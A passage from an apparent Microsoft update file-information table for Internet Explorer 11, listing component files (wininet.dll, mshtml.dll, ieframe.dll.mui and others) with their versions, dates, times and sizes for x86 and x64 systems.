11.0.9600.18378| 11-Jun-2016| 12:04| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:05| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nwininet.dll| 11.0.9600.20112| 13-Aug-2021| 19:27| 4,387,840 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 20:16| 47,104 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18666| 16-Apr-2017| 1:51| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:13| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:46| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:47| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 13-Aug-2021| 21:45| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 13:56| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:03| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 75,776 \nieui.dll| 11.0.9600.18895| 1-Jan-2018| 20:44| 476,160 \niedkcs32.dll| 18.0.9600.20045| 4-Jun-2021| 21:34| 333,312 \ninstall.ins| Not versioned| 13-Aug-2021| 17:57| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:20| 616,104 \nieapfltr.dll| 11.0.9600.20112| 13-Aug-2021| 19:16| 710,656 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 128,512 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 20:03| 27,136 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:24| 73,728 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.18895| 1-Jan-2018| 20:55| 489,472 \niedvtool.dll| 11.0.9600.20045| 4-Jun-2021| 22:45| 772,608 \nDiagnosticsHub_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:52| 38,912 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:29| 415,744 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 280,064 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 15-Aug-2014| 15:51| 11,892 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:35| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:36| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 4,096 \nF12.dll.mui| 11.0.9600.17278| 15-Aug-2014| 19:47| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:29| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:29| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:31| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 4,096 \nF12.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:44| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:39| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 3,584 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:28| 175,104 \nF12Resources.dll| 11.0.9600.18939| 10-Feb-2018| 9:17| 10,948,096 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:27| 256,000 \nF12.dll| 11.0.9600.19963| 12-Feb-2021| 18:17| 1,207,808 \nmsfeeds.dll| 11.0.9600.20112| 13-Aug-2021| 19:35| 696,320 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:53| 1,518 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 16:49| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 4:57| 52,736 \nmsfeedssync.exe| 11.0.9600.17416| 30-Oct-2014| 20:25| 11,264 \nmshta.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 12,800 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 76,800 \nmshtml.dll| 11.0.9600.20112| 13-Aug-2021| 20:33| 20,294,144 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 2:20| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:40| 3,228 \nIEAdvpack.dll| 11.0.9600.17416| 30-Oct-2014| 20:14| 112,128 \nieetwcollector.exe| 11.0.9600.18666| 16-Apr-2017| 0:47| 104,960 \nieetwproxystub.dll| 11.0.9600.17416| 30-Oct-2014| 20:23| 47,616 \nieetwcollectorres.dll| 11.0.9600.16518| 6-Feb-2014| 2:19| 4,096 \nielowutil.exe| 11.0.9600.19404| 9-Jul-2019| 20:06| 221,184 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:45| 310,784 \nIEShims.dll| 11.0.9600.20045| 4-Jun-2021| 21:12| 290,304 \niexpress.exe| 11.0.9600.17416| 30-Oct-2014| 20:27| 152,064 \nwextract.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 137,728 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 17:59| 40,448 \nExtExport.exe| 11.0.9600.17416| 30-Oct-2014| 20:20| 25,600 \nWindows Pop-up Blocked.wav| Not versioned| 23-Sep-2013| 19:58| 85,548 \nWindows Information Bar.wav| Not versioned| 23-Sep-2013| 19:58| 23,308 \nWindows Feed Discovered.wav| Not versioned| 23-Sep-2013| 19:58| 19,884 \nWindows Navigation Start.wav| Not versioned| 23-Sep-2013| 19:58| 11,340 \nbing.ico| Not versioned| 23-Sep-2013| 19:36| 5,430 \nieUnatt.exe| 11.0.9600.17416| 30-Oct-2014| 20:12| 115,712 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 13-Aug-2021| 21:05| 2,956 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 459,776 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 579,584 \nMemoryAnalyzer.dll| 11.0.9600.20045| 4-Jun-2021| 21:48| 1,399,296 \nMshtmlDac.dll| 11.0.9600.19867| 12-Oct-2020| 21:43| 64,000 \nnetworkinspection.dll| 11.0.9600.19846| 23-Sep-2020| 20:28| 1,075,200 \noccache.dll| 11.0.9600.17416| 30-Oct-2014| 19:48| 130,048 \ndesktop.ini| Not versioned| 18-Jun-2013| 5:18| 65 \nwebcheck.dll| 11.0.9600.19963| 12-Feb-2021| 18:13| 230,400 \ndesktop.ini| Not versioned| 18-Jun-2013| 5:19| 65 \npdm.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 442,992 \nmsdbg2.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 315,008 \npdmproxy100.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 99,984 \nmsrating.dll| 11.0.9600.19507| 5-Oct-2019| 19:57| 168,960 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:25| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:26| 1,988 \niertutil.dll| 11.0.9600.20064| 14-Jun-2021| 21:16| 2,308,608 \nie4uinit.exe| 11.0.9600.19963| 12-Feb-2021| 18:11| 692,224 \niernonce.dll| 11.0.9600.17416| 30-Oct-2014| 20:15| 30,720 \niesetup.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 62,464 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:55| 16,303 \ninseng.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 91,136 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 90,624 \nTimeline.dll| 11.0.9600.19963| 12-Feb-2021| 18:23| 154,112 \nTimeline_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:40| 124,928 \nTimeline.cpu.xml| Not versioned| 24-Jul-2014| 12:11| 3,197 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 818,176 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 235,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,066,432 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:39| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:48| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,060,288 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieframe.dll| 11.0.9600.20112| 13-Aug-2021| 19:47| 13,881,856 \nieframe.ptxml| Not versioned| 5-Feb-2014| 21:40| 24,486 \nieinstal.exe| 11.0.9600.18921| 9-Feb-2018| 21:35| 475,648 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:30| 526,294 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 499,654 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 552,337 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 944,559 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:38| 457,561 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 543,946 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 526,557 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 575,838 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:30| 570,737 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 548,119 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 639,271 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 525,504 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 488,488 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 548,494 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 559,343 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 535,067 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 541,455 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 804,470 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 503,909 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 521,583 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 420,082 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:28| 436,651 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:28| 436,651 \ninetres.admx| Not versioned| 11-Jan-2021| 19:25| 1,678,023 \ninetcomm.dll| 6.3.9600.20112| 13-Aug-2021| 19:39| 880,640 \nINETRES.dll| 6.3.9600.16384| 21-Aug-2013| 21:14| 84,480 \njscript9.dll| 11.0.9600.20112| 13-Aug-2021| 19:52| 4,119,040 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 18:37| 620,032 \njscript.dll| 5.8.9600.20112| 13-Aug-2021| 19:56| 653,824 \nvbscript.dll| 5.8.9600.20112| 13-Aug-2021| 20:04| 498,176 \n \n### \n\n__\n\nInternet Explorer 11 on all supported x64-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nactxprxy.dll| 6.3.9600.20045| 4-Jun-2021| 21:30| 2,882,048 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 21:22| 108,544 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 19:18| 65,024 \nurlmon.dll| 11.0.9600.20112| 13-Aug-2021| 19:28| 1,562,624 \niexplore.exe| 11.0.9600.19036| 24-May-2018| 23:30| 817,296 \nWininetPlugin.dll| 6.3.9600.17416| 30-Oct-2014| 21:51| 43,008 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:35| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 16:01| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:59| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:20| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 16:00| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:59| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:58| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 16:02| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:57| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:57| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:37| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:37| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 13-Aug-2021| 23:22| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:37| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 31,232 \nhtml.iec| 2019.0.0.20045| 4-Jun-2021| 22:23| 417,280 \ninetcpl.cpl| 11.0.9600.20045| 4-Jun-2021| 21:42| 2,132,992 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 307,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 293,888 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 290,304 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:17| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:18| 299,008 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 303,104 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:33| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 283,648 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 291,840 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:18| 299,520 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 275,968 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 293,376 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:26| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:26| 258,048 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 256,512 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 288,256 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 285,184 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:26| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 297,472 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:13| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 290,816 \nmshtml.dll.mui| 11.0.9600.20112| 13-Aug-2021| 23:23| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:13| 286,208 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:06| 281,600 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:04| 286,720 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:04| 292,352 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:04| 242,176 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 243,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:17| 243,200 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 73,728 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:00| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 78,848 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 15-Aug-2014| 20:19| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:00| 74,752 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 62,464 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 75,264 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 73,216 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 41,472 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 37,888 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 70,656 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 69,632 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 68,608 \nF12Resources.dll.mui| 11.0.9600.20112| 13-Aug-2021| 23:22| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 59,904 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 69,120 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 29,696 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 30,720 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:47| 77,824 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 276,480 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 